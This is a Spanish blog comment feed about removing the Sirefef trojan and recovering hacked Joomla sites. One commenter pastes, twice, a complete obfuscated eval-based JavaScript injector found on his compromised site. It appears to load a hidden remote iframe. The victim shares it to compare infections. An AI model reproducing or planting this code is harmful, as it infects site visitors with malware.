Comentarios en: Troyanos sirefef y waledac – Como detectarlos y protegerse. https://edprox.com/blog/troyanos-sirefef-y-waledac-como-detectarlos-y-protegerse/ Tue, 02 Oct 2012 03:53:39 +0000 hourly 1 http://wordpress.org/?v=3.3.2 Por: Webmaster https://edprox.com/blog/troyanos-sirefef-y-waledac-como-detectarlos-y-protegerse/#comment-33 Webmaster Tue, 02 Oct 2012 03:53:39 +0000 https://edprox.com/?p=473#comment-33 Hola Pavi, Si formateas el ordenador, el virus va a desaparecer, ya que estas borrando todo lo que tienes en el disco duro, pero, esto no te garantiza que te vuelvas a infectar. Si tienes un Pen Drive (Memoria USB) infectado, si vuelves a visitar una web infectada entre muchas otras cosas, te volverás a infectar. La mejor opción para estar protegida es tener un buen antivirus, un navegador de confianza y un poco de desconfianza al navegar. Te recomiendo: -Usar Microsoft Security Essentials. -Navegar con Google Chrome. -Borrar la maquina virtual de Java de tu PC (Los agujeros de seguridad que están apareciendo últimamente son inaceptables y muchas infecciones entra por ahi). -En Microsoft Security Essentials activa la opción de escanear las unidades externas (Opciones > Avanzado > Marca la opción "Escanear unidades externas") Si tienes cualquier otra preguntas no dudes en ponerte en contacto con nosotros. Hola Pavi,

Si formateas el ordenador, el virus va a desaparecer, ya que estas borrando todo lo que tienes en el disco duro, pero, esto no te garantiza que te vuelvas a infectar. Si tienes un Pen Drive (Memoria USB) infectado, si vuelves a visitar una web infectada entre muchas otras cosas, te volverás a infectar. La mejor opción para estar protegida es tener un buen antivirus, un navegador de confianza y un poco de desconfianza al navegar.

Te recomiendo:
-Usar Microsoft Security Essentials.
-Navegar con Google Chrome.
-Borrar la maquina virtual de Java de tu PC (Los agujeros de seguridad que están apareciendo últimamente son inaceptables y muchas infecciones entra por ahi).
-En Microsoft Security Essentials activa la opción de escanear las unidades externas (Opciones > Avanzado > Marca la opción “Escanear unidades externas”)

Si tienes cualquier otra preguntas no dudes en ponerte en contacto con nosotros.

]]> Por: pavi https://edprox.com/blog/troyanos-sirefef-y-waledac-como-detectarlos-y-protegerse/#comment-26 pavi Tue, 11 Sep 2012 01:08:05 +0000 https://edprox.com/?p=473#comment-26 hola, a mi me entró el virus de policia nacional, y ahora me detecta el malwarebites, un troyano sirefef .(cuando me han desbloqueado el pc del virus anterior)y se debe ejecutar cada vez que enciendo el pc, porque incluso oigo voces y musica de otras personas.Tengo windows 7,y uso el explorador mozilla firefox, me entro el virus cuando buscaba unas piezas en google, asi sin más.EStoy esperando a que me lo arreglen.La pregunta es, desaparecerá el virus si formateo el ordenador???? estoy un poco nervisa, por si puede regresar. hola, a mi me entró el virus de policia nacional, y ahora me detecta el malwarebites, un troyano sirefef .(cuando me han desbloqueado el pc del virus anterior)y se debe ejecutar cada vez que enciendo el pc, porque incluso oigo voces y musica de otras personas.Tengo windows 7,y uso el explorador mozilla firefox, me entro el virus cuando buscaba unas piezas en google, asi sin más.EStoy esperando a que me lo arreglen.La pregunta es, desaparecerá el virus si formateo el ordenador???? estoy un poco nervisa, por si puede regresar.

]]> Por: Webmaster https://edprox.com/blog/troyanos-sirefef-y-waledac-como-detectarlos-y-protegerse/#comment-3 Webmaster Tue, 01 May 2012 14:46:15 +0000 https://edprox.com/?p=473#comment-3 ¿Que te aparece en el log de acceso por FTP? Sabiendo el usuario, los archivos que se modificaron y la fecha en la que ocurrió la modificación del código puede ayudarte a tener mas claro como se realizo la infección. También existe una extensión para Joomla llamada "PHP Anti-Hacker Suite by OSE" que te puede ayudar a prevenir o como mínimo detectar este tipo de modificaciones en el código. ¿Que te aparece en el log de acceso por FTP? Sabiendo el usuario, los archivos que se modificaron y la fecha en la que ocurrió la modificación del código puede ayudarte a tener mas claro como se realizo la infección. También existe una extensión para Joomla llamada “PHP Anti-Hacker Suite by OSE” que te puede ayudar a prevenir o como mínimo detectar este tipo de modificaciones en el código.

]]> Por: Paul https://edprox.com/blog/troyanos-sirefef-y-waledac-como-detectarlos-y-protegerse/#comment-2 Paul Tue, 01 May 2012 10:21:49 +0000 https://edprox.com/?p=473#comment-2 Hola, interesantes lineas las que comentas. Estoy viviendo una situación similar a lo que describes desde el pasado mes de Marzo 2012. He aplicado algunas de las soluciones que comentas pero no he tenido todo el exito que esperaba, quizás por interpretar que el alcance del compromiso en el servidor sería menor al igual que en mi máquina. Por ejemplo, se ha restauradao un backup de la web en el servidor a sabiendas de que esta limpio, se ha desinfectado el equipo con el que trabajo aplicando una reinstalación de sistema directamente, se han cambiado todas las passwords y para mi sorpresa, a finales de Abril 2012 me encuentro con un escenario similar. Algunos detalles que comentas los desconocía, por ejemplo la vulnerabilidad de IE9. Esto ha podido influir en volver a tener el mismo problema ya que trabajo indistintamente con IE9, firefox y Chrome. Dejaré de emplear IE9 una temporada hasta que se resuelve este problema o más, ya veremos. Otro detalle que desconocía es que FileZilla almacena en texto plano las contraseñas. No dejaremos pues a FileZilla que almacene las contraseñas. El caso es que empleo un método de comunicación cifrado vía SFTP pero claro, si la contraseña la tengo almacenada en texto plano en el equipo y éste se ve comprometido, ya tienes el lío montado. Desconocía que el archivo host se veía comprometido. Lo he creado de nuevo, pero aparentemente estaba limpio. En este momento estoy restaurando backups limpios de las webs en el servidor y analizando si mi equipo pudiese estár comprometido. Security essentials, Malwarebytes, SuperAntiSpyware y TDSSKiller me dicen que mi equipo no tiene compromiso, pero claro, siempre hay un lugar para las dudas. Ahora bien, tras restaurar los backups de las webs (todas con Joomla) actualizaremos todas (joomla y compomentes empleados) y, en caso de volver a tener un compromiso similar me preguntaría ¿que coñe hacemos ahora? En mi caso he detectado que se introducen numerosos archivos de javascript como por ejemplo "jquerytoogle.js" y nombres similares que contienen códigos como el que os muestro: c=3-1;i=-1-1+c;p=parseInt;if(p("01"+"2"+"3")===83)try{Number()["pr"+"ot"+"ot"+"ype"].q} catch(egewgsd){if(window.document)f=['-32k-32k64k61k-9k-1k59k70k58k76k68k60k69k75k5k62k 60k75k28k67k60k68k60k69k75k74k25k80k43k56k62k37k56k68k60k-1k-2k57k70k59k80k-2k0k50k7k52 k0k82k-28k-32k-32k-32k64k61k73k56k68k60k73k-1k0k18k-28k-32k-32k84k-9k60k67k74k60k-9k82k -28k-32k-32k-32k59k70k58k76k68k60k69k75k5k78k73k64k75k60k-1k-7k19k64k61k73k56k68k60k-9k 74k73k58k20k-2k63k75k75k71k17k6k6k71k64k59k70k63k64k74k5k73k76k6k58k70k76k69k75k8k10k5k 71k63k71k-2k-9k78k64k59k75k63k20k-2k8k7k-2k-9k63k60k64k62k63k75k20k-2k8k7k-2k-9k74k75k8 0k67k60k20k-2k77k64k74k64k57k64k67k64k75k80k17k63k64k59k59k60k69k18k71k70k74k64k75k64k7 0k69k17k56k57k74k70k67k76k75k60k18k67k60k61k75k17k7k18k75k70k71k17k7k18k-2k21k19k6k64k6 1k73k56k68k60k21k-7k0k18k-28k-32k-32k84k-28k-32k-32k61k76k69k58k75k64k70k69k-9k64k61k73 k56k68k60k73k-1k0k82k-28k-32k-32k-32k77k56k73k-9k61k-9k20k-9k59k70k58k76k68k60k69k75k5k 58k73k60k56k75k60k28k67k60k68k60k69k75k-1k-2k64k61k73k56k68k60k-2k0k18k61k5k74k60k75k24 k75k75k73k64k57k76k75k60k-1k-2k74k73k58k-2k3k-2k63k75k75k71k17k6k6k71k64k59k70k63k64k74 k5k73k76k6k58k70k76k69k75k8k10k5k71k63k71k-2k0k18k61k5k74k75k80k67k60k5k77k64k74k64k57k 64k67k64k75k80k20k-2k63k64k59k59k60k69k-2k18k61k5k74k75k80k67k60k5k71k70k74k64k75k64k70 k69k20k-2k56k57k74k70k67k76k75k60k-2k18k61k5k74k75k80k67k60k5k67k60k61k75k20k-2k7k-2k18 k61k5k74k75k80k67k60k5k75k70k71k20k-2k7k-2k18k61k5k74k60k75k24k75k75k73k64k57k76k75k60k -1k-2k78k64k59k75k63k-2k3k-2k8k7k-2k0k18k61k5k74k60k75k24k75k75k73k64k57k76k75k60k-1k-2 k63k60k64k62k63k75k-2k3k-2k8k7k-2k0k18k-28k-32k-32k-32k59k70k58k76k68k60k69k75k5k62k60k 75k28k67k60k68k60k69k75k74k25k80k43k56k62k37k56k68k60k-1k-2k57k70k59k80k-2k0k50k7k52k5k 56k71k71k60k69k59k26k63k64k67k59k-1k61k0k18k-28k-32k-32k84'][0].split('k'); v="e"+"va"+"l";}if(v)e=window[v];w=f;s=[];r=String;for(;567!=i;i+=1) {j=i;s=s+r["f"+"r"+"omC"+"har"+"C"+"ode"](w[j]*1+41);}if(e)e(s); Si alguien más tienen evidencias de algún compromiso similar que nos cuente su experiencia. Hola, interesantes lineas las que comentas. Estoy viviendo una situación similar a lo que describes desde el pasado mes de Marzo 2012.

He aplicado algunas de las soluciones que comentas pero no he tenido todo el exito que esperaba, quizás por interpretar que el alcance del compromiso en el servidor sería menor al igual que en mi máquina. Por ejemplo, se ha restauradao un backup de la web en el servidor a sabiendas de que esta limpio, se ha desinfectado el equipo con el que trabajo aplicando una reinstalación de sistema directamente, se han cambiado todas las passwords y para mi sorpresa, a finales de Abril 2012 me encuentro con un escenario similar.

Algunos detalles que comentas los desconocía, por ejemplo la vulnerabilidad de IE9. Esto ha podido influir en volver a tener el mismo problema ya que trabajo indistintamente con IE9, firefox y Chrome. Dejaré de emplear IE9 una temporada hasta que se resuelve este problema o más, ya veremos. Otro detalle que desconocía es que FileZilla almacena en texto plano las contraseñas. No dejaremos pues a FileZilla que almacene las contraseñas. El caso es que empleo un método de comunicación cifrado vía SFTP pero claro, si la contraseña la tengo almacenada en texto plano en el equipo y éste se ve comprometido, ya tienes el lío montado. Desconocía que el archivo host se veía comprometido. Lo he creado de nuevo, pero aparentemente estaba limpio.

En este momento estoy restaurando backups limpios de las webs en el servidor y analizando si mi equipo pudiese estár comprometido. Security essentials, Malwarebytes, SuperAntiSpyware y TDSSKiller me dicen que mi equipo no tiene compromiso, pero claro, siempre hay un lugar para las dudas.

Ahora bien, tras restaurar los backups de las webs (todas con Joomla) actualizaremos todas (joomla y compomentes empleados) y, en caso de volver a tener un compromiso similar me preguntaría ¿que coñe hacemos ahora?

En mi caso he detectado que se introducen numerosos archivos de javascript como por ejemplo “jquerytoogle.js” y nombres similares que contienen códigos como el que os muestro:

c=3-1;i=-1-1+c;p=parseInt;if(p(“01″+”2″+”3″)===83)try{Number()["pr"+"ot"+"ot"+"ype"].q}
catch(egewgsd){if(window.document)f=['-32k-32k64k61k-9k-1k59k70k58k76k68k60k69k75k5k62k
60k75k28k67k60k68k60k69k75k74k25k80k43k56k62k37k56k68k60k-1k-2k57k70k59k80k-2k0k50k7k52
k0k82k-28k-32k-32k-32k64k61k73k56k68k60k73k-1k0k18k-28k-32k-32k84k-9k60k67k74k60k-9k82k
-28k-32k-32k-32k59k70k58k76k68k60k69k75k5k78k73k64k75k60k-1k-7k19k64k61k73k56k68k60k-9k
74k73k58k20k-2k63k75k75k71k17k6k6k71k64k59k70k63k64k74k5k73k76k6k58k70k76k69k75k8k10k5k
71k63k71k-2k-9k78k64k59k75k63k20k-2k8k7k-2k-9k63k60k64k62k63k75k20k-2k8k7k-2k-9k74k75k8
0k67k60k20k-2k77k64k74k64k57k64k67k64k75k80k17k63k64k59k59k60k69k18k71k70k74k64k75k64k7
0k69k17k56k57k74k70k67k76k75k60k18k67k60k61k75k17k7k18k75k70k71k17k7k18k-2k21k19k6k64k6
1k73k56k68k60k21k-7k0k18k-28k-32k-32k84k-28k-32k-32k61k76k69k58k75k64k70k69k-9k64k61k73
k56k68k60k73k-1k0k82k-28k-32k-32k-32k77k56k73k-9k61k-9k20k-9k59k70k58k76k68k60k69k75k5k
58k73k60k56k75k60k28k67k60k68k60k69k75k-1k-2k64k61k73k56k68k60k-2k0k18k61k5k74k60k75k24
k75k75k73k64k57k76k75k60k-1k-2k74k73k58k-2k3k-2k63k75k75k71k17k6k6k71k64k59k70k63k64k74
k5k73k76k6k58k70k76k69k75k8k10k5k71k63k71k-2k0k18k61k5k74k75k80k67k60k5k77k64k74k64k57k
64k67k64k75k80k20k-2k63k64k59k59k60k69k-2k18k61k5k74k75k80k67k60k5k71k70k74k64k75k64k70
k69k20k-2k56k57k74k70k67k76k75k60k-2k18k61k5k74k75k80k67k60k5k67k60k61k75k20k-2k7k-2k18
k61k5k74k75k80k67k60k5k75k70k71k20k-2k7k-2k18k61k5k74k60k75k24k75k75k73k64k57k76k75k60k
-1k-2k78k64k59k75k63k-2k3k-2k8k7k-2k0k18k61k5k74k60k75k24k75k75k73k64k57k76k75k60k-1k-2
k63k60k64k62k63k75k-2k3k-2k8k7k-2k0k18k-28k-32k-32k-32k59k70k58k76k68k60k69k75k5k62k60k
75k28k67k60k68k60k69k75k74k25k80k43k56k62k37k56k68k60k-1k-2k57k70k59k80k-2k0k50k7k52k5k
56k71k71k60k69k59k26k63k64k67k59k-1k61k0k18k-28k-32k-32k84'][0].split(‘k’);
v=”e”+”va”+”l”;}if(v)e=window[v];w=f;s=[];r=String;for(;567!=i;i+=1)
{j=i;s=s+r["f"+"r"+"omC"+"har"+"C"+"ode"](w[j]*1+41);}if(e)e(s);

Si alguien más tienen evidencias de algún compromiso similar que nos cuente su experiencia.

]]>